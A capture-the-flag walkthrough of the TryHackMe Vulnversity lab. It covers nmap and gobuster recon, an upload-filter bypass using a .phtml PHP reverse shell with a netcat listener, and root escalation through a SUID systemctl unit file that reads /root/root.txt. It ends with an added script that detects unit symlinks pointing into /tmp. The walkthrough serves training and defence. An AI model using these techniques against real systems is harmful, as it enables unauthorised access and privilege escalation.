TryHackMe — Vulnversity

Learn about active recon, web app attacks and privilege escalation.


Machine Information:


NMAP Cheat Sheet:


Reconnaissance

1. Scan the box, how many ports are open?

sudo nmap -PS 10.10.213.40

-PS == TCP SYN discovery to the given ports (nmap -h lists it together with -PA/-PU/-PY as "TCP SYN/ACK, UDP or SCTP discovery to given ports").


2. What version of the squid proxy is running on the machine?

Note: the squid proxy runs on port 3128, as shown in the port discovery scan.

sudo nmap -sV -p 3128 10.10.213.40

-sV == Probe open ports to determine service/version info.

-p 3128 == Restrict the scan to TCP port 3128.

3. How many ports will nmap scan if the flag -p-400 was used?

sudo nmap -p-400 10.10.213.40

-p-400 == scans ports 1 through 400 (400 ports in total).

4. Using the nmap flag -n what will it not resolve?

nmap -h


5. What is the most likely operating system this machine is running?

sudo nmap -O -sV 10.10.213.40

-O == OS detection

-sV == Version scan


6. What port is the web server running on?


Locating directories using GoBuster


7. What is the directory that has an upload form page?

gobuster dir -u http://10.10.213.40:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 2>/dev/null


Compromise the webserver


8. Run this attack, what extension is allowed?

Uploading a .php file is not allowed.

Test other extension files to determine what is allowed.


Extensions to test, according to the hints.


Only the .phtml extension does not contain the “Extension not allowed” error message.


Exploitation


Edit the exploit and make it executable:

nano php-reverse-shell.phtml
chmod +x php-reverse-shell.phtml


Upload the exploit to the target machine:


Set up a netcat listener on the attacker machine and execute the exploit on the target machine:

nc -lvnp 4444

http://10.10.213.40:3333/internal/uploads/php-reverse-shell.phtml


And we got shell…


8. What is the name of the user who manages the webserver?

9. What is the user flag?


Privilege Escalation


10. On the system, search for all SUID files. What file stands out?

find / -perm -4000 2>/dev/null


Escalate privilege:

11. Become root and get the last flag (/root/root.txt)

nc -lvnp 4444 == set up a netcat listener on the attacker machine

First we create a variable which holds a unique file name.

eop=$(mktemp).service

Then we create a unit file and write it to the path held in the variable.

echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop

Inside the unit file we entered a command which makes the shell run cat and redirect its output to a file called output in the /tmp folder. Finally we use the /bin/systemctl program (SUID, as found above) to link and enable the unit file.

/bin/systemctl link $eop

Created symlink from /etc/systemd/system/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.

/bin/systemctl enable --now $eop

Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.x1uzp01alO.service to /tmp/tmp.x1uzp01alO.service.

Let's see if it worked...

ls -lah /tmp

cat /tmp/output

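From the defender's side, the trace this technique leaves is visible in the systemctl output above: a symlink under /etc/systemd/system that resolves to a unit file in /tmp, outside every normal unit directory. The following POSIX shell function is an added example, not part of the original walkthrough or of the TryHackMe room, that audits a unit directory for such links; the default trusted prefixes are an assumption based on Debian/Ubuntu-style layouts and can be overridden by passing them as extra arguments.

```shell
#!/bin/sh
# audit_unit_links UNIT_DIR [TRUSTED_PREFIX...]
# Prints "link -> target" for every *.service symlink (directly in UNIT_DIR or in
# its *.wants/ directories) whose resolved target lies outside the trusted
# prefixes. Returns 0 when nothing suspicious is found, 1 otherwise.
# Added example; the default prefix list is an assumption, adjust it to the
# unit search path of your distribution (see systemd.unit(5)).
audit_unit_links() {
    unit_dir="$1"
    shift
    # Default trusted unit locations when no prefixes were supplied.
    [ $# -gt 0 ] || set -- /etc/systemd /lib/systemd /usr/lib/systemd /run/systemd
    found=0
    for link in "$unit_dir"/*.service "$unit_dir"/*.wants/*.service; do
        # Skip non-matching globs and regular files; only symlinks matter here.
        [ -L "$link" ] || continue
        # Resolve to the physical path so /tmp/../etc tricks do not hide anything.
        target=$(readlink -f "$link" 2>/dev/null) || target=$(readlink "$link")
        ok=0
        for prefix in "$@"; do
            case "$target" in
                "$prefix"/*) ok=1; break ;;
            esac
        done
        if [ "$ok" -eq 0 ]; then
            printf '%s -> %s\n' "$link" "$target"
            found=1
        fi
    done
    return $found
}

# Typical use on a live host (uncomment to run):
# audit_unit_links /etc/systemd/system || echo "unit links outside trusted paths found"
```

A finding is not proof of compromise on its own (packages rarely, but occasionally, ship units elsewhere), but a target under /tmp, /var/tmp, /dev/shm or a home directory is exactly the footprint of the `systemctl link` step shown above and deserves a look at the unit's ExecStart line.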

References:

https://tryhackme.com/room/vulnversity

https://n0w4n.nl/vulnversity/
